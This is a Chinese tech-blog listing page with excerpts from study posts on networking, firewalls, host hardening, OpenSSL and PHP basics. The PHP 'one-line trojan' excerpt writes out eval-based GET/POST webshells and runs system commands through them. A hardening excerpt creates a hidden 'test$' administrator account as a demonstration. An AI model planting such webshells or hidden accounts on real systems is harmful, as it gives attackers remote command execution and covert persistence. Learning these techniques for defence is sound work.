- 博客(53)
- 收藏
- 关注
RSS订阅原创 移动接入资源发布
资源介绍资源是指远程接入SSL VPN后授权终端允许访问的网络服务根据实现机制和应用服务的不同将资源分为3类:1、WEB应用2、TCP应用3、L3VPN应用WEB介绍WEB应用WEB 应用通过SSL设备反向代理技术实现用户访问内网服务器支持类型:HTTP,HTTPS优点:客户端免控件,所有浏览器均支持。建议:使用到泛域名解析技术,需要客户提前注册泛域名。TCP应用TCP应用的实现是通过在Client安装Proxy控件,由控件抓取访问服务器的TCP连接并对数
2022-01-04 20:19:49
1459
原创 GRE隧道技术
隧道模式主要应用场景:经常用于私网与私网之间通过公网进行通信,建立安全VPN通道在隧道模式下,原始IP分组被封装成一个新的IP报文,在内部报头以及外部报头之间插入一个IPSec报头,原IP地址被当作有效载荷的一部分收到IPSec的保护。另外,通过对数据加密,还可以隐藏原数据包中的IP地址,这样更有利于保护端到端通信中数据的安全性。封装方式:增加新的IP(外网IP)头,其后是ipsec包头,之后再将原来的整个数据包封装。案例配置命令...
2022-01-04 19:53:27
8912
原创 移动身份认证技术
移动接入 现在的移动办公和远程办公已经成为了常态,扩展了组织网络的边界,让组织更加充分的利用互联网,让组织的信息化建设发挥更大的价值,然后就有了移动接入这个概念背景 用户远程接入企业内网,有哪些技术可以实现在复杂业务场景下,保障终端用户接入内网的身份安全性,同时尽可能保障用户使用体验?身份认证技术6种固定认证方式本地用户名/密码,LDAP服务器,Radius服务器,CA认证,AD域单点登录辅助认证硬件特征码,动态令牌,短信认证(主认证至少需要1种...
2022-01-04 19:48:56
404
原创 防火墙概述
墙,始于防,忠于守。从古至今,墙予人以安全之意。防火墙分类一、按物理特性划分1、软件防火墙2、硬件防火墙二、按性能划分1、百兆级防火墙2、千兆级防火墙......三、按防火墙结构划分1、单一主机防火墙2、路由集成防火墙3、分布式防火墙......四、按防火墙技术划分1、包过滤防火墙2、应用代理防火墙3、状态检测防火墙......防火墙的功能随着防火墙的发展,防火墙能提供的安全功能也越来越多。主要是提供了以下7个安全功能。1、
2021-12-30 20:50:01
1270
原创 Easy ip
Easy ip不同于静态和动态NAT,他的命令更加的简洁,使用起来比静态动态NAT更加的顺手Easy ip 原理 Easy IP:实现原理和NAPT相同,同时转换IP地址、传输层端口,区别在于Easy IP没有地址池的概念,使用接口地址作为NAT转换的公有地址。 Easy IP适用于不具各固定公网IP地址的场景:如通过DHCP. PPPoE摄号获取地址的私有网线出口,可以直接使用获取到的动志地址进行转换。案例PC机根据 要求配置IP和网关...
2021-12-27 19:10:49
644
原创 静态动态NAT
随着互联网用户的增多,IPv4 的公有地址资源显得越发短缺。同时IPv4公有地址责源存在地址分配不均的问题,这导致部分地区的IPv4可用公有地址严重不足。为解决该问题,使用过渡技能解决IPv4公有地址短缺就显得尤为必要,所以才有了NAT的概念静态NAT介绍:静态转换是指将内部网络的私有IP地址转换为公有IP地址,IP地址对是一对一的,是一成不变的,某个私有IP地址只转换为某个公有IP地址。借助于静态转换,可以实现外部网络对内部网络中某些特定设备(如服务器)的访问。静态NAT实验先.
2021-12-23 20:57:59
1574
原创 单臂路由和acl
单臂路由:简介:单臂路由(router-on-a-stick)是指在路由器的一个接口上通过配置子接口(或“逻辑接口”,并不存在真正物理接口)的方式,实现原来相互隔离的不同VLAN(虚拟局域网)之间的互联互通。优缺点: VLAN能有效分割局域网,实现各网络区域之间的访问控制。但现实中,往往需要配置某些VLAN之间的互联互通。比如,你的公司划分为领导层、销售部、财务部、人力部、科技部、审计部,并为不同部门配置了不同的VLAN,部门之间不能相互访问,有效保证了各部门的信息安全。但经常出现领导层需要
2021-12-23 20:42:43
445
原创 不同WLAN间通信
实验如下:pc配置如图所示PC13PC14PC15PC16具体命令如下所示:<Huawei><Huawei>sysEnter system view, return user view with Ctrl+Z.[Huawei]un in enInfo: Information center is disabled.[Huawei]val [Huawei]vl [Huawei]vlan b [Huawei]vlan b.
2021-12-22 20:25:39
735
原创 相同VLAN间通信
valn介绍VLAN(Virtual Local Area Network)的中文名为"虚拟局域网"。虚拟局域网(VLAN)是一组逻辑上的设备和用户,这些设备和用户并不受物理位置的限制,可以根据功能、部门及应用等因素将它们组织起来,相互之间的通信就好像它们在同一个网段中一样,由此得名虚拟局域网,由于交换机端口有两种VLAN属性,其一是VLANID,其二是VLANTAG,分别对应VLAN对数据包设置VLAN标签和允许通过的VLANTAG(标签)数据包,不同VLANID端口,可以通过相互允许VLANTA
2021-12-22 19:49:58
2374
原创 ospf 基本介绍和简单命令应用
ospf简介:OSPF(Open Shortest Path First开放式最短路径优先)是一个内部网关协议(Interior Gateway Protocol,简称IGP),用于在单一自治系统(autonomous system,AS)内决策路由。是对链路状态路由协议的一种实现,隶属内部网关协议(IGP),故运作于自治系统内部。著名的迪克斯彻(Dijkstra)算法被用来计算最短路径树。OSPF支持负载均衡和基于服务类型的选路,也支持多种路由形式,如特定主机路由和子网路由等。OSPF协议基本原理
2021-12-22 19:39:41
1178
原创 静态路由、默认路由的基本配置
原理:1、静态路由:是指用户或网络管理员手工配置的路由信息。当网络拓扑结构或链路状态发生改变时,需要网络管理员手工配置静态路由信息。 相比较动态路由协议,静态路由无需频繁的交换各自的路由表,配置简单,比较适合小型、简单的网络环境。不适合大型和复杂的网络环境的原因是:当网络拓扑结构和链路状态发生改变时,网络管理员需要做大量的调整,工作量繁重,而且无法感知错误发生,不易排错。2、默认路由:是一种特殊的静态路由,当路由表中与数据包目的地址没有匹配的表项时,数据包将根据默认路由条目进行转发。默认路...
2021-12-21 19:17:47
2008
原创 Windows、Linux主机加固
任务一:windows主机加固gpedit.msc-----本地组策略。lusrmgr.msc----本机用户和组。services.msc---本地服务设置。compmgmt.msc---计算机管理。regedit.exe----注册表编辑器。fsmgmt.msc-----共享文件夹管理器。secpol.msc-----本地安全策略eventvwr-------事件查看器。1、禁用无用账户,三个月之后确认没问题之后在删除2、分配账户,根据业务要求分配不同的用
2021-12-20 19:39:11
1136
原创 TCP/IP协议栈模型分析
标准TCP/IP协议是用于计算机通信的一组协议,通常被称为TCP/IP协议栈,以它为基础组建的互联网是目前国际上规模最大的计算机网络。正因为互联网的广泛应用,使得TCP/IP成为了事实上的网络标准。1.OSI七层模型与TCP/IP协议栈模型对应关系osl七层 模型与TCO/IP协议栈模型对应关系如上图所示七层模型从下往上分别是:物理层、数据链路层、网络层、传输层、会话层、表示层、应用层。四层模型分别是:主机到网络层(比特)、网络层(数据帧)、传输层(数据包)、应用层(数据段)。.
2021-12-20 19:22:18
128
原创 Windows隐藏账户处置
一台windows server 2012 r2步骤:一、使用命令行创建用户1、打开命令行右击win键,打开命令提示符2、新建test$用户net user test$ sxf!7890 /addnet localgroup administrators test$ /add观察test$用户使用系统计算机管理工具右击win键,打开计算机管理发现可以找到test$用户使用命令查看用户在命令行输入net user可以看到只有...
2021-12-15 19:25:00
88
原创 扫描工具使用
nessus 基础使用进入这个连接去获取激活码:https://zh-cn.tenable.com/products/nessus/activation-code?tns_redirect=true安装好Nessus,自动弹出一个页面,然后去注册注册成功后连接SSL出现这个界面说明已经成功了2 awvs使用先在虚拟机上安装DockerPull拉取下镜像Docker run -it -d -p 13443:3443 secfa/docker-awvs将Docker的.
2021-12-15 09:05:06
1053
原创 基线管理之MariaDB安全配置
操作系统级权限检查检查数据库的运行权限,不建议以root运行数据库,防止越权攻击ps -ef | egrep "^mysql.*$"如图所示运行用户为MySQL禁用mariadb的历史记录功能查找缓存文件find $HOME -name ".mysql_history"将缓存文件指向空文件rm -f $HOME/.mysql_historyln -s /dev/null $HOME/.mysql_history查看并配置数据库存放路径权限登录数据库...
2021-12-13 21:02:49
96
原创 基线管理之apache安全配置
确保apache无法访问根目录查看apache配置文件,确定里面对根目录是拒绝所有请求vim /etc/httpd/conf/httpd.conf其中,第一行和第五行,指明了目录,即Linux的根目录 /第二行,表示禁止使用.htaccess文件,覆盖此处配置第四行,表示禁止访问根目录删除网站的目录浏览权限限制HTTP方法apache默认没有限制限制http方法,我们可以在需要的路径下进行限制在路径配置中加入<LimitExcept GET POST &
2021-12-13 20:51:21
1728
原创 基线管理之Centos安全配置
网络配置检查不用的连接使用命令:ip link show up如果有需要关闭的接口,可以使用ip link setdown关闭IP转发先查看IP转发配置显示为1,可以使用以下命令改为0:sysctl -w net.ipv4.ip_forward=0关闭数据包重定向先 查看重定向设置sysctl net.ipv4.conf.all.send_redirects发现为1,可以使用下面命令改为0sysctl -w net.ipv4.conf.al..
2021-12-13 19:19:58
2874
原创 基线管理之Windows安全配置
打开组策略输入gpedit.msc账户策略配置1、密码策略2、账户锁定策略点击应用即可修改配置安全选项账户配置禁止使用Microsoft账户登录交互式登录配置用户账户控制高级安全审核配置账户登录账户管理详细跟踪登录/注销对象访问特权使用...
2021-12-13 17:26:42
1319
原创 Windows主机加固
主机加固的方法:删除或禁用无用账户,防止被提权;根据业务要求分配不同用户组;加强密码复杂度,如最短密码长度为八位、至少包含两类字符、特殊符号、密码最长存留期等等;账户锁定策略,设置密码错误次数账户默认账户安全禁用或删除无用账户(建议先禁用三个月,确认没问题之后在删除)禁用guest账户(在计算机管理中操作)Guest账户为临时账户,但是该账户允许用户登录到网络、浏览internet以及关闭计算机。黑客可以通过guest用户提权到administrator组得到管理员权限,进行后渗透
2021-12-09 20:05:03
1324
原创 Windows测评
secpol.msc //本地安全策略查看用户审计是否单独组设定阈值打开本地安全策略,账户策略审核策略禁用账户打开计算机管理,找到本地用户组,选择用户,双击要关闭账户防火墙设置网络列表策略器高级审核 策略配置eventvwr.msc // 事件查看器查看关键日志,查看是否关机通过任务类别排序任务类别为(1)的为开机,(2)为系统关机,(1...
2021-12-09 19:06:49
739
原创 windows简单命令
win+r 打开运行,输入cmd进入dos系统界面dir 列出所有文件dir /a 显示隐藏文件dir /b 显示当前目录中的子文件与文件的名称 cd 目录名称 进入一个目录cd .. 返回上一个目录文件夹有空格,需要双引号,没有空格则不需要切换到其他盘D:或者D 盘输入cmd,然后回车md 文件夹名...
2021-12-08 19:58:44
347
原创 Linux主机加固
账户和口令禁用或删除无用账号 //减少系统无用账户,降低安全风险cat /etc/shadow 查看有多少账户使用命令 userdel <用户名> 删除不必要的账号使用命令 passwd -l <用户名> 锁定不必要的账号。使用命令 passwd -u <用户名> 解锁必要的账号。检查特殊账户检查是否存在空口令和root权限的账号。使用命令 awk -F: '($2=="")' /etc/shado...
2021-12-07 20:13:53
402
原创 使用密钥登录SSH服务器
实验环境两台centos服务器一台作为SSH服务器一台作为SSH客户端,使用密钥连接SSH服务器实验步骤一、配置服务器SSH密钥登录以下操作使用服务器进行1、编辑SSH配置文件vim /etc/ssh/sshd_config2、删除#号删除PubkeyAuthentication yes此行前面的#号保存退出3、重启ssh服务systemctl restart sshd二、使用客户端生成密钥以下操作使用客户端进行1、生成...
2021-12-06 20:12:51
93
原创 密码学之apache部署https
实验环境一台Centos 7.2 已经安装openssl组件,已安装apache httpd,用于搭建https服务器一台windows 10客户端,已安装chrome浏览器实验步骤一、生成独立的CA1、 生成ca的keyopenssl genrsa -des3 -out ca.key 40962、生成CA的证书openssl req -new -x509 -days 365 -key ca.key -out ca.crt二、生成服务器的私钥key和签名请求文件csr
2021-12-06 19:43:56
1771
原创 OPENSSL基础使用
实验环境:一台Centos 7.2 已经安装openssl实验步骤创建一个文件,用于被加密,文件内容为12345,文件名为test.txtecho 12345 >test.txt一、对称加密1、使用rc4加解密加密openssl enc -e -rc4 -in test.txt -out test_rc4.enc解密openssl enc -d -rc4 -in test_rc4.enc -out test_rc4.dm2、使用AES加解密open.
2021-12-06 17:52:15
108
原创 PHP一句话木马
Get、 Post、Assert首先在www目录下创建出对应文件以 .php为后缀名Get输入<?php @eval($_GET([‘cmd’]?); //eval把字符串作为PHP代码执行?>保存之后在网页访问127.0.0.1/get.php?cmd=system(‘ipconfig’);输入whoami,访问用户名Post <?php @eval($_POST[‘cmd’]);?>Post ...
2021-12-03 17:22:46
917
原创 PHP多维数组
一个数组中的值可以是另一个数组,另一个数组的值也可以是一个数组。PHP - 多维数组多维数组是包含一个或多个数组的数组。在多维数组中,主数组中的每一个元素也可以是一个数组,子数组中的每一个元素也可以是一个数组。新建一个php.php文件输入:<?php phpinfo(); ?>把这个加入“多维数组.php”include "php.php";...
2021-12-02 20:26:44
56
原创 PHP表单、$_POST、$_GET
PHP 表单处理$_POST 变量预定义的 $_POST 变量用于收集来自 method="post" 的表单中的值。从带有 POST 方法的表单发送的信息,对任何人都是不可见的(不会显示在浏览器的地址栏),并且对发送信息的量也没有限制。注释:然而,默认情况下,POST 方法的发送信息的量最大值为 8 MB(可通过设置 php.ini 文件中的 post_max_size 进行更改)。下面的实例包含了一个 HTML 表单,带有两个输入框和一个提交按钮当用户填写完上面的表单并点击提
2021-12-02 19:16:15
70
原创 PHP函数、魔术常量
PHP 的真正威力源自于它的函数。创建 PHP 函数函数是通过调用函数来执行的。PHP 函数准则:函数的名称应该提示出它的功能 函数名称以字母或下划线开头(不能以数字开头)PHP 函数 - 添加参数为了给函数添加更多的功能,我们可以添加参数,参数类似变量。参数就在函数名称后面的一个括号内指定。PHP 魔术常量PHP 向它运行的任何脚本提供了大量的预定义常量。不过很多常量都是由不同的扩展库定义的,只有在加载了这些扩展库时才会出现,或者动态加载后,或者在...
2021-12-02 17:32:19
43
原创 PHP数组、PHP全局变量
PHP数组数组能够在单个变量中存储多个值数组是一个能在单个变量中存储多个值的特殊变量在 PHP 中创建数组在 PHP 中,array() 函数用于创建数组在 PHP 中,有三种类型的数组:数值数组- 带有数字 ID 键的数组 关联数组- 带有指定的键的数组,每个键关联一个值 多维数组- 包含一个或多个数组的数组获取数组的长度 - count() 函数count() 函数用于返回数组的长度(元素的数量)sort() - 对数组进行升序排列...
2021-12-01 20:40:14
164
1
原创 PHP 运算符
PHP算数运算符运算符 名称 实例 结果 x+y 和 2+2 4 x-y 差 5-2 3 x * y 乘(积) 5*2 10 x / y 除(商) 15/5 3 x % y 余数 5%2 1 - x x取反值 <?php$x =2;echo -$x;?> -2 a . b 并置(连接两个字符串) "Hi"
2021-12-01 20:22:31
113
1
原创 PHP字符串变量、PHP IF...Else语句
字符串变量用于包含有字符的值。在创建字符串之后,我们就可以对它进行操作。可以直接在函数中使用字符串,或者把它存储在变量中。PHP并置运算符在 PHP 中,只有一个字符串运算符。并置运算符 (.) 用于把两个字符串值连接起来。PHP strlen()函数strlen() 函数返回字符串的长度(字节数)。PHP strpos()函数strpos() 函数用于在字符串内查找一个字符或一段指定的文本。如果在字符串中找到匹配,该函数会返回第一个匹配的字符位置。如果未找到..
2021-12-01 17:39:51
299
2
原创 PHP 类型比较、PHP常量
PHP类型比较PHP 变量比较,包含松散和严格比较松散比较:使用两个等号==比较,只比较值,不比较类型 严格比较:用三个等号===比较,除了比较值,也比较类型PHP常量常量值被定义后,在脚本的其他任何地方都不能被改变。常量是一个简单值的标识符。该值在脚本中不能改变。一个常量由英文字母、下划线、和数字组成,但数字不能作为首字母出现。 (常量名不需要加 $ 修饰符)。常量是全局的常量在定义后,默认是全局变量,可以在整个运行的脚本的任何地方使用。在函数内使用常量...
2021-12-01 17:12:50
207
1
原创 PHP 5 数据类型
PHP包括:String(字符串), Integer(整型), Float(浮点型), Boolean(布尔型), Array(数组), Object(对象), NULL(空值)。PHP字符串一个字符串是一串字符的序列,以"Hello world!"为例PHP整型整数是一个没有小数的数字。规则如下:整数必须至少有一个数字 (0-9) 整数不能包含逗号或空格 整数是没有小数点的 整数可以是正数或负数 整型可以用三种格式来指定:十进制, 十六进制( 以 0x 为前缀)或八进制(.
2021-12-01 16:38:43
182
原创 PHP电脑安装
第一步:右击电脑,选择属性第二步:进入高级系统设置选择环境变量第三步:选择path点击编辑、新建,然后浏览找到php7.34nts,所在的文件夹最终显示结果如下图所示使用cmd查看是否安装成功输入 php -v显示以上内容则表示安装成功...
2021-11-30 20:40:39
239
1
原创 JavaScript Cookie
Cookie 是一些数据, 存储于你电脑上的文本文件中。当 web 服务器向浏览器发送 web 页面时,在连接关闭后,服务端不会记录用户的信息。Cookie 的作用就是用于解决 "如何记录客户端的用户信息":当用户访问 web 页面时,他的名字可以记录在 cookie 中。 在用户下一次访问该页面时,可以在 cookie 中读取用户访问记录。设置cookie值的函数首先,我们创建一个函数用于存储访问者的名字:以上的函数参数中,cookie 的名称为 cname,cookie 的值
2021-11-30 20:27:40
284
原创 JavaScript简单应用
JavaScript简介JavaScript 是互联网上最流行的脚本语言,这门语言可用于 HTML 和 web,更可广泛用于服务器、PC、笔记本电脑、平板电脑和智能手机等设备JavaScript是脚本语言JavaScript 是一种轻量级的编程语言。 JavaScript 是可插入 HTML 页面的编程代码。 JavaScript 插入 HTML 页面后,可由所有的现代浏览器执行。JavaScript 直接写入HTML只能在HTML中使用document.write。如果在文档加载
2021-11-30 20:12:56
395
原创 PHP 局部和全局变量
PHP简介PHP是服务器端脚本语言,需要对HTML和css有基本了解PHP(全称:PHP:Hypertext Preprocessor,即"PHP:超文本预处理器")是一种通用开源脚本语言。PHP基本语法PHP脚本可以放在文档的任意位置PHP脚本以<?php 开始,以?>结束PHP 中的每个代码行都必须以分号结束。分号是一种分隔符,用于把指令集区分开来。PHP注释// 为PHP单行注释/* */ 这是多行注释...
2021-11-30 19:06:50
748
原创 HTTP、HTTPS
HTTPHTTPS HTTPS (全称:Hyper Text Transfer Protocol over SecureSocket Layer),是以安全为目标的 HTTP 通道,在HTTP的基础上通过传输加密和身份认证保证了传输过程的安全性[1]。HTTPS 在HTTP 的基础下加入SSL,HTTPS 的安全基础是 SSL,因此加密的详细内容就需要 SSL。HTTPS 存在不同于 HTTP 的默认端口及一个加密/身份验证层(在 HTTP与TCP之间)。这个系统提供了身份验证与加密通...
2021-11-29 20:53:29
1593
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人